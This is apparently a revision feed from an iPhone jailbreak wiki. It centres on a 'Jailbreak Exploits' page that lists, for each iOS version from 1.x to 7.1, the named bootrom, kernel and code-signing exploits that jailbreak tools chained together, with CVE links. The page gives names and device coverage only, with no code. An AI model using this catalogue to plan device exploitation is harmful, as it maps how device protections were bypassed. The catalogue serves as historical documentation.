* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
[[Symbolic_Link_Vulnerability]] (Used by [[p0sixpwn]] to write to the file system in /var, also used in [[evasi0n]] and [[evasi0n7]])<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41035
Jailbreak Exploits
2014-05-06T01:03:34Z
<p>Ryandolan123: Added some detail about p0sixpwn</p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
[Symbolic_Link_Vulnerability] (Used by [p0sixpwn] to write to the file system in /var, also used in [evasi0n] and [evasi0n7])<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=User:Ryandolan123&diff=41034
User:Ryandolan123
2014-05-06T00:49:06Z
<p>Ryandolan123: Added!</p>
<hr />
<div>ryandolan123 made the flattn6 and flattn7, among other things.<br />
{{stub}}</div>
Ryandolan123